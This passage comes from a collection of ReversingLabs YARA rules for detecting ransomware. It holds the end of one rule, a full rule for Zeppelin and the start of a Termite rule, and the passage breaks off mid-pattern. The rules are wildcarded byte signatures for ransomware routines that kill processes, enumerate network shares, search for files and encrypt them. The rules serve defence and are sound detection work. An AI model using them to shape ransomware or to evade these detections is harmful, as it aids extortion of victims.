-            F6 FF FF FF 17 2D 06 D0 1E 01 00 06 26 16 0A 38 BC 01 00 00 28 0A 00 00 06 [0-2] 6F 0D
-            00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 14 20
-            B0 0F 00 00 28 2F 00 00 06 [0-2] 1F 0A 8D 76 00 00 01 13 07 11 07 16 20 BF 0F 00 00 28
-            2F 00 00 06 [0-2] A2 11 07 17 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 18 20 C5 0F
-            00 00 28 2F 00 00 06 [0-2] A2 11 07 19 20 C8 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1A
-            20 CB 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1B 20 CE 0F 00 00 28 2F 00 00 06 [0-2] A2
-        }
-		$pacman_find_encrypted_2 = {
-            11 07 1C 20 D1 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1D 20 D4 0F 00 00 28 2F 00 00 06
-            [0-2] A2 11 07 1E 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1F 09 20 D7 0F 00 00 28
-            2F 00 00 06 [0-2] A2 11 07 14 14 14 28 7A 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 0D 28 07
-            00 00 06 28 1A 04 00 06 [0-2] 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06
-            [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 28 36 05 00 06
-            [0-2] 2C 78 1A 45 01 00 00 00 F6 FF FF FF 7E 16 00 00 04 28 9D 02 00 06 [0-2] 28 0A 00
-            00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04
-            00 06 [0-2] 28 E2 05 00 06 [0-2] 09 16 28 23 01 00 06 28 0A 00 00 06 [0-2] 6F 0D 00 00
-            06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00
-            06 [0-2] 28 66 04 00 06 DE 0F 25 28 4E 04 00 06 13 04 28 02 03 00 06 DE 00 06 17 D6 0A
-            06 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2]
-            28 E2 04 00 06 [0-2] 3F 1B FE FF FF 1B 45 01 00 00 00 F6 FF FF FF 28 28 00 00 06 2A
-        }
-		$pacman_encrypt = {
-            28 65 02 00 06 [0-2] 0A 16 13 05 20 00 04 00 00 13 07 06 11 07 28 2A 05 00 06 [0-2] 2C
-            19 1C 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 20 01 00 06 26 11 07 13 05 2B 15 11 07 15
-            D6 13 07 11 07 17 2F D0 17 45 01 00 00 00 F6 FF FF FF 20 DA 0F 00 00 28 2F 00 00 06 [0-2]
-            11 05 28 9D 02 00 06 [0-2] 28 E2 02 00 06 [0-2] 28 6E 03 00 06 06 28 0A 03 00 06 [0-2]
-            0B 14 13 04 14 0D 1F 0E 8D 25 00 00 01 13 0B 11 0B 16 ?? 9C 11 0B 17 ?? 9C 11 0B 18
-            ?? 9C 11 0B 19 ?? 9C 11 0B 1A ?? 9C 11 0B 1B ?? 9C 11 0B 1C ?? 9C 11 0B 1D ?? 9C 11 0B
-            1E 20 ?? ?? ?? ?? 9C 11 0B 1F 09 20 ?? ?? ?? ?? 9C 11 0B 1F 0A 20 ?? ?? ?? ?? 9C 11 0B
-            1F 0B 1F ?? 9C 11 0B 1F 0C 1F ?? 9C 11 0B 1F 0D 1F ?? 9C 11 0B 13 06 02 11 06 11 05 07
-            12 04 12 03 28 1F 01 00 06 05 2C 18 18 45 01 00 00 00 F6 FF FF FF 06 11 04 09 28 96 03
-            00 06 [0-2] 0C 2B 0C 06 11 04 09 28 7E 05 00 06 [0-2] 0C 04 08 17 28 45 01 00 06 [0-2]
-            13 08 20 01 04 00 00 8D 25 00 00 01 13 09 03 11 09 16 20 00 04 00 00 28 3A 03 00 06 [0-2]
-            13 0A 11 0A 16 33 0C 1D 45 01 00 00 00 F6 FF FF FF DE 24 11 08 11 09 16 11 0A 28 F6 04
-            00 06 2B CF 11 08 2C 11 18 45 01 00 00 00 F6 FF FF FF 11 08 28 1E 03 00 06 DC DE 0C 28
-            4E 04 00 06 28 02 03 00 06 DE 00 08 28 1E 03 00 06 2A
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $pacman_find_encrypted_1 and $pacman_find_encrypted_2 and $pacman_encrypt )
-}
-rule REVERSINGLABS_Win32_Ransomware_Zeppelin : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Zeppelin ransomware."
-		author = "ReversingLabs"
-		id = "f5cf514d-4dd0-58b7-82d0-5cb516a139a3"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Zeppelin.yara#L1-L109"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8fb07e49d2ff9d497fb36a5d901748315ae519f5ef845d1a5ec6341d0eb1f68c"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Zeppelin"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$search_files_p1 = {
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 45 ?? E8 ??
-            ?? ?? ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 2B D8 43 53 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 42
-            8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 30 FF 75 ?? 68 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 83 F8
-            ?? 7C ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84
-            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C3
-        }
-		$search_files_p2 = {
-            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50
-            8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ??
-            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ??
-            ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C3
-        }
-		$kill_processes = {
-            55 8B EC 33 C9 51 51 51 51 51 51 51 51 53 56 57 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ??
-            88 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 55 68 ?? ?? ?? ??
-            64 FF 32 64 89 22 8D 55 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B D8 8B 45 ?? 89 58 ?? 8B C3 B2 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
-            C6 40 ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B F0 85 F6
-            7E ?? BB ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D
-            55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? 8D 55 ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 40 ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ??
-            EB ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B1 ?? 33
-            D2 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ??
-            8B 45 ?? 80 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5F
-            5E 5B 8B E5 5D C3
-        }
-		$enum_shares = {
-            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 53 56 57 89 45 ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? 33
-            D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 89 45 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B
-            45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 48 85
-            C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 55 ?? 8B 45 ?? 8B
-            18 FF 53 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 FF 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? 33 D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
-            ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ??
-            8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89
-            10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? FF 45 ??
-            FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A
-            59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ??
-            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB
-            ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8B D9 88
-            55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C6 E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 88 5E ?? 88 5E ?? 56 6A ?? 8D 46 ?? 50 B9 ?? ?? ?? ?? 33 D2 33 C0 E8 ??
-            ?? ?? ?? 8B D8 89 5E ?? 85 DB 75 ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 45 ??
-            89 45 ?? C6 45 ?? ?? 8D 45 ?? 50 6A ?? 8B 0D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
-            ?? C3
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $kill_processes ) and ( $enum_shares ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files )
-}
-rule REVERSINGLABS_Win32_Ransomware_Termite : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Termite ransomware."
-		author = "ReversingLabs"
-		id = "350011fa-1e3c-5079-8fe7-968340a3aca0"
-		date = "2020-08-31"
-		modified = "2020-08-31"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Termite.yara#L1-L151"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "df273de81fc58cb0bacf021ee539ec6dbfa1f1a3e13bd46519ee313595cafb4c"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Termite"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8
-            ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
-            ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 8B 1B 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
-            58 8B 5D ?? 89 03 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D
-            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85
-            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ??
-            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B
-            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 75 ?? E8
-        }
-		$find_files_p2 = {
-            83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 94 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85
-            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83
-            F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F
-            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ??
-            B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8
-        }
-		$find_files_p3 = {
-            50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 81 7D ?? ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? FF 75 ?? 8B 5D
-            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45
-            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85
-            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0
-            75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
-            ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ??
-            8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? A1 ?? ?? ?? ?? 50
-            FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ??
-            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D
-            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45
-            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 68
-        }
-		$find_files_p4 = {
-            FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ??
-            6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? B8
-            ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? FF 75 ?? B9 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ??
-            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ??
-            ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ??
-            ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
-            ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50
-        }
-		$find_files_p5 = {
-            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ??
-            ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
-            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53
-            E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ??
-            ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ??
-            0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9
-            ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85
-            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
-		$encrypt_files_p1 = {
-            B8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53
